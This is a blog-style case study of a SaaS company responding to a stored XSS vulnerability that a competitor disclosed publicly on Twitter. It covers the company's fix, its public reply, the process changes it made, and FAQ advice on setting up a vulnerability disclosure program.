TL;DR
A competitor discovered an XSS vulnerability in a project management SaaS product and tweeted about it before contacting the company. The public disclosure was embarrassing and felt unfair, but it taught the team important lessons about security, competition, and the value of having a vulnerability disclosure program in place.
The Tweet
The CTO of a growing project management SaaS was having a normal Tuesday morning when the cofounder sent a link to a tweet. It was from a developer at a competing company.
"Just found a stored XSS vulnerability in their product. User input in profiles isn't sanitized. Anyone using this for sensitive data should be careful. @their handle you might want to look at this."
The tweet had a screenshot showing malicious JavaScript executing in the app. It already had 200+ retweets.
The Initial Reaction
The CTO's first emotion was anger. Why didn't they contact the company privately? Why tweet it with screenshots? This felt like an attack disguised as helpfulness.
The second emotion was panic. If this was real (and the screenshot suggested it was), the product had a serious vulnerability that was now public knowledge.
The third emotion, after calming down, was acceptance. Whatever the competitor's motives, the vulnerability existed. And that was the team's fault, not theirs.
Validating the Report
Within 10 minutes, the engineering team confirmed the vulnerability. The user profile "bio" field accepted HTML and JavaScript. When other users viewed a profile, the malicious code would execute in their browsers.
This was bad. An attacker could:
- Steal session tokens
- Redirect users to phishing pages
- Modify what users saw on the page
- Perform actions as the victim user
How the team missed it: The bio field was added in a quick feature update. The developer assumed the frontend framework would handle sanitization. It didn't. There was no code review, no security testing. Classic "ship fast, fix later" thinking.
The Fix and Response
Technical Fix (30 minutes)
- Added input sanitization on the server side
- Added output encoding when rendering bios
- Sanitized all existing bio content in the database
- Added automated tests to prevent regression
Public Response
The company replied to the tweet publicly:
"Thank you for reporting this. We've confirmed the vulnerability and deployed a fix within 30 minutes. We appreciate security reports and have set up security@our domain for future disclosures. We take this seriously and are reviewing our processes."
This response was carefully crafted. The team thanked the competitor (even though they were frustrated), confirmed they took it seriously, announced the fix, and showed they were learning from it.
The Aftermath
Customer Reaction
Some customers reached out concerned. The company sent a proactive email to all users explaining what happened, what was at risk, and what was done to fix it. Most appreciated the transparency.
The company lost two customers over it. It gained one who specifically said they liked how the situation was handled.
The Competitor
The team never talked to the competitor directly about it. Part of the CTO wanted to call them out for the public disclosure. But the more he thought about it, the more he realized:
- They didn't create the vulnerability; the team did
- The company didn't have a clear way for people to report security issues
- Public disclosure, while uncomfortable, got the team to fix it faster
The uncomfortable truth: If the company had a security contact, a vulnerability disclosure program, or a bug bounty, the competitor might have reported it privately. The public disclosure happened because the team made it the only visible option.
What the Team Changed
Vulnerability Disclosure Program
The company created a security.txt file and a clear process for reporting vulnerabilities. They committed to responding within 24 hours and fixing critical issues within 72 hours.
Security Review Process
Any feature that handles user input now requires a security review. The team created a checklist: sanitization, encoding, validation, access control.
Automated Security Scanning
The team added automated security scanning to the CI/CD pipeline. It catches common vulnerabilities like XSS before they reach production.
Regular Audits
Quarterly security reviews of the codebase, focusing on areas that handle user input, authentication, and data access.
Lessons on Competition and Security
This experience taught the team that security vulnerabilities don't care about competitive dynamics. Users are at risk regardless of who finds the flaw.
Yes, the competitor could have handled it better. But so could the company. They could have:
- Not had the vulnerability in the first place
- Had a clear way for anyone to report security issues
- Been doing regular security testing themselves
Blaming the messenger doesn't fix the message.
Should security researchers always disclose privately first?
Responsible disclosure norms suggest giving vendors time to fix issues before going public. However, if there's no clear way to report issues or vendors don't respond, public disclosure becomes more justifiable.
How do I set up a vulnerability disclosure program?
Start simple: create a security.txt file (securitytxt.org), add a security contact email, and publish a basic policy stating how you'll handle reports. You can expand to bug bounties later.
What's the difference between XSS types?
Stored XSS (like this case) saves malicious code in your database and executes when others view it. Reflected XSS comes from URL parameters. DOM-based XSS happens entirely in client-side code. All are serious.
How should I respond to public vulnerability disclosure?
Acknowledge quickly, thank the reporter (regardless of method), confirm you're investigating, announce when fixed. Don't be defensive or attack the reporter. Focus on protecting users.
Find Vulnerabilities First
Scan your app for XSS and other security issues before someone else does.